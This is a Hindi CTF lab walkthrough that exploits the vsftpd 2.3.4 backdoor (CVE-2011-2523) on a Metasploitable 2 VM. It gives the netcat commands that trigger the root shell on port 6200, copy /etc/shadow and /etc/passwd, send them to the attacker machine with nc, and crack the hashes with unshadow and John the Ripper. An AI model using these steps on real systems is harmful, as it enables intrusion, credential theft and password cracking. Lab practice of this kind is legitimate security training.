
vsftpd 2.3.4 बैकडोर (CVE-2011-2523) का शोषण करते हुए चरण-दर-चरण CTF वॉकथ्रू, Metasploitable 2 से /etc/shadow और /etc/passwd को कैप्चर और क्रैक करने के लिए।
असुरक्षित Metasploitable 2 सर्वर से डिक्रिप्टेड /etc/shadow और /etc/passwd फ़ाइल कैप्चर करें।
इस CTF के लिए, हम दो वर्चुअल मशीनों के साथ VMware Workstation Pro चलाते हैं। हम आक्रमणकारी मशीन के रूप में Kali Linux का उपयोग करते हैं और असुरक्षित मशीन के रूप में Metasploitable 2 का।
ओपन ए वर्चुअल मशीन विकल्प चुनें और अनज़िप की गई Kali Linux फ़ाइल चुनेंओपन विकल्प चुनें, फिर अनज़िप की गई Metasploitable 2 फ़ाइल चुनेंप्ले वर्चुअल मशीन बटन दबाएंI moved It या I copied It विकल्प चुनने का संकेत मिले, तो I copied It विकल्प चुनेंkali का उपयोग करके Kali Linux में लॉगिन करेंmsfadmin का उपयोग करके Metasploitable में लॉगिन करेंip addr show चलाएं और inet सेक्शन का IP पता रिकॉर्ड करेंMassachusetts Institute of Technology Research and Engineering CVE-2011-2523 को एक सामान्य कमज़ोरी और एक्सपोज़र के रूप में विस्तृत करता है जहाँ vsftpd 2.3.4 20110630 और 20110703 के बीच डाउनलोड किया गया, जिसमें एक बैकडोर है जो पोर्ट 6200/tcp पर एक शेल खोलता है।
nmap <असुरक्षित-मशीन-आईपी-पता>nc <असुरक्षित-मशीन-आईपी-पता> 21:) के साथ कोई भी स्ट्रिंग है, user <string>:) दर्ज करेंpass <string> दर्ज करें nc -v <असुरक्षित-मशीन-आईपी-पता> 6200ip addr showwhoami का उपयोग करके दिखाएं कि रूट एक्सेस प्रदान किया गया था/etc/shadow और /etc/passwd फ़ाइल को दूसरी फ़ाइल में कॉपी करेंcp /etc/shadow shadow.txtcp /etc/passwd passwd.txtip addr show का उपयोग करके inet के अंतर्गत आईपी पता देखेंnc -l -p 1234 > shadow.txt का उपयोग करके फ़ाइलों को सुनेंnc -w 3 <गंतव्य-आईपी> 1234 < shadow.txtJohn टूल प्रारूप में प्रारूपित करेंunshadow passwd.txt shadow.txt > unshadowed-inputcat unshadowed-input का उपयोग करके फ़ाइल देखें, इसमें उपयोगकर्ता नाम और पासवर्ड संग्रहीत होना चाहिएJohn कमांड और वर्डलिस्ट का उपयोग करके शैडो फ़ाइल को डिक्रिप्ट करेंrockyou.txt का उपयोग करेंsudo gzip -d /usr/share/wordlists/rockyou.txt.gz का उपयोग करके Kali Linux पर वर्डलिस्ट फ़ाइल को अनज़िप करेंkali का उपयोग करेंjohn unshadowed-input –wordlist=/usr/share/wordlists/rockyou.txt का उपयोग करके पासवर्ड अनहैश करेंjohn –show unshadowed-input